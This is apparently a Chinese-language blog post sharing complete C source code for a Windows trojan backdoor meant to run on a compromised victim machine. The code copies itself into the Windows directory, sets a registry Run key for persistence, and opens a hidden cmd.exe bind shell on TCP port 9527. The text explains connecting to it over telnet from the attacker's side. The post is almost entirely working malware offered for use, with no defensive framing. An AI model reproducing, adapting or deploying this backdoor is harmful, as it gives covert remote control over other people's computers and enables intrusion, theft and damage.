一个简单木马后门的程序
以下代码可以在VC++编译下实现,是用C语言写的木马后门程序,本程序是运行在服务器端的(即肉鸡),运行成功后,可以在我们控制端打开cmd.exe输入命令:telnet xx.xx.xx.xx(对方IP) 9527(9527是我自己定义的端口号,你可以在下面的代码中改个你想要对方开启的端口)
进行连接,连接成功后就可以进入服务器端的命令行进行操作。
代码部分:
#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
// C RunTime Header Files
#include <stdlib.h>
#include <malloc.h>
#include <memory.h>
#include <tchar.h>
//OpenRegedit()和CopySystem()的作用是让服务器端开机自启动本程序
int OpenRegedit() //此函数作用是取得打开注册表启动键的句柄
{
HKEY hKey;
TCHAR str1[100] = "system";
TCHAR str2[100] = "C:\\WINDOWS\\SystemEx.exe";
TCHAR str[150]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE , str , 0 , KEY_CREATE_SUB_KEY | KEY_SET_VALUE , &hKey)!=ERROR_SUCCESS)
{
return 0;
}
if(RegSetValueEx(hKey,str1,0,REG_SZ,(BYTE*)str2,150)!=ERROR_SUCCESS)
{
return 0;
}
RegCloseKey(HKEY_LOCAL_MACHINE);
return 0;
}
int CopySystem() //此函数是把自己拷贝到系统的C:\WINDOWS\目录下
{
TCHAR Module[256];
TCHAR str[100]="C:\\WINDOWS\\SystemEx.exe";
if(GetModuleFileName(NULL,Module,256)==0)
{
return 0;
}
if(FALSE==CopyFile(Module,str,TRUE))
{
return 0;
}
return 0;
}
class CThreadNode { //创建一个Class
public:
SOCKET m_Sock;
HANDLE hPipe;
CThreadNode() {
m_Sock = INVALID_SOCKET;
hPipe = NULL;
}
};
BOOL SocketInit() //Socket的初始化
{
WSADATA wsaData = {0};
if ( WSAStartup(MAKEWORD(2, 2), &wsaData) == NO_ERROR ) {
return TRUE;
}else{
return FALSE;
}
}
int SendData(SOCKET m_Sock, void *pBuf, DWORD dwBufLen) //自定义的函数此函数为了避免发送数据过大而丢失
{
if ( m_Sock == INVALID_SOCKET || !pBuf || dwBufLen <= 0 ) {
return -1;
}
int iCurrSend = 0, offset = 0;
do {
iCurrSend = send(m_Sock, (char *)pBuf+offset, dwBufLen, 0);//不断发送数据
if ( iCurrSend <= 0 ) {
break;
}
dwBufLen -= iCurrSend;
offset += iCurrSend;
} while ( dwBufLen > 0 );
return offset;
}
BOOL bExit = FALSE;
#define RECV_BUF_LEN 4096
char szCmdBuf[MAX_PATH] = {0};
DWORD WINAPI ThreadInputProc(LPVOID lpParam)//此函数功能是时刻接收控制端发送过来的数据
{
CThreadNode tNode = *(CThreadNode *)lpParam;
DWORD dwWrited = 0, dwRecvd = 0;
char szBuf[MAX_PATH] = {0};
BOOL bRet = FALSE;
while ( TRUE ) {
dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);
if ( dwRecvd > 0 && dwRecvd != SOCKET_ERROR ) {
WriteFile(tNode.hPipe, szBuf, dwRecvd, &dwWrited, NULL);
}else{
closesocket(tNode.m_Sock);
WriteFile(tNode.hPipe, "exit\r\n", sizeof("exit\r\n"), &dwWrited, NULL);
bExit = TRUE;
break;
}
Sleep(50);
}
return TRUE;
}
DWORD WINAPI ThreadOutputProc(LPVOID lpParam) //此函数功能时刻向客户端发送cmd输出的数据
{
CThreadNode tNode = *(CThreadNode *)lpParam;
char szBuf[RECV_BUF_LEN] = {0};
DWORD dwReadLen = 0, dwTotalAvail = 0;
BOOL bRet = FALSE;
while ( !bExit ) {
dwTotalAvail = 0;
bRet = PeekNamedPipe(tNode.hPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
if ( bRet && dwTotalAvail > 0 ) {
bRet = ReadFile(tNode.hPipe, szBuf, RECV_BUF_LEN, &dwReadLen, NULL);
if ( bRet && dwReadLen > 0 ) {
SendData(tNode.m_Sock, szBuf, dwReadLen);
}
Sleep(50);
}
}
return TRUE;
}
BOOL StartShell(UINT uPort)
{
if ( !SocketInit() ) { //初始化Stocket库
return FALSE;
}
SOCKET m_ListenSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if ( m_ListenSock == INVALID_SOCKET ) {
return FALSE;
}
sockaddr_in sServer = {0};
sServer.sin_family = AF_INET;
sServer.sin_addr.s_addr = htonl(INADDR_ANY);//用主机的任意可用IP地址
sServer.sin_port = htons(uPort); //要开启的端口号
if ( bind(m_ListenSock, (sockaddr *)&sServer, sizeof(sServer)) == SOCKET_ERROR ) { //将套接字绑定到IP地址和端口
return FALSE;
}
if ( listen(m_ListenSock, 5) == SOCKET_ERROR ) { //让端口进入监听模式
return FALSE;
}
SOCKET m_AcceptSock = accept(m_ListenSock, NULL, NULL); //创建新的套接字,然后等待与客户端的连接
// 创建管道的一些初始化
CThreadNode m_ReadNode, m_WriteNode;
STARTUPINFO si = {0};
si.cb = sizeof(STARTUPINFO);
PROCESS_INFORMATION pi = {0};
DWORD dwThreadRead = 0, dwThreadWrite = 0;
HANDLE hReadPipe1 = NULL, hWritePipe1 = NULL; // Input the command;
HANDLE hReadPipe2 = NULL, hWritePipe2 = NULL; // Get the command results;
HANDLE hThreadOutput = NULL, hThreadInput = NULL;
SECURITY_ATTRIBUTES sa = {0};
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
//以下创建两根匿名管道,一根用于向cmd写数据,另一根用于获取cmd传回的数据
if ( !CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0) || !CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0) ) {
return FALSE;
}
m_ReadNode.m_Sock = m_WriteNode.m_Sock = m_AcceptSock;
GetStartupInfo(&si); //获得本线程当前的信息结构体
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = hReadPipe1; //CMD从管道1读取的,hReadPipe1的数据来自hWritePipe1
si.hStdOutput = si.hStdError = hWritePipe2;//cmd输出的数据写入到管道2
si.wShowWindow = SW_HIDE;
TCHAR szCmdLine[MAX_PATH] = {0};
GetSystemDirectory(szCmdLine, MAX_PATH); //取得系统目录
strcat(szCmdLine,TEXT("\\cmd.exe"));
if ( !CreateProcess(szCmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) ) { //创建线程cmd把结构体si传给线程cmd
return FALSE;
}
//客户端从管道2读取数据
m_ReadNode.hPipe = hReadPipe2;
hThreadOutput = CreateThread(NULL, 0, ThreadOutputProc, &m_ReadNode, 0, &dwThreadWrite);
//向管道1写入数据
m_WriteNode.hPipe = hWritePipe1;
hThreadInput = CreateThread(NULL, 0, ThreadInputProc, &m_WriteNode, 0, &dwThreadRead);
HANDLE szHandles[] = { hThreadOutput, hThreadInput }; //两个线程的句柄
WaitForMultipleObjects(2, szHandles, TRUE, INFINITE); //等待两个线程都退出后才退出,最后一个参数表示等待时间无限
return TRUE;
}
int APIENTRY WinMain(HINSTANCE hInstance, //主函数
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
OpenRegedit();
CopySystem();
StartShell(9527); //我自定义的端口号9527
return 0;
}
分享快乐哈!本人还是菜鸟中的菜鸟,希望大家以后多多支持!
没有评论:
发表评论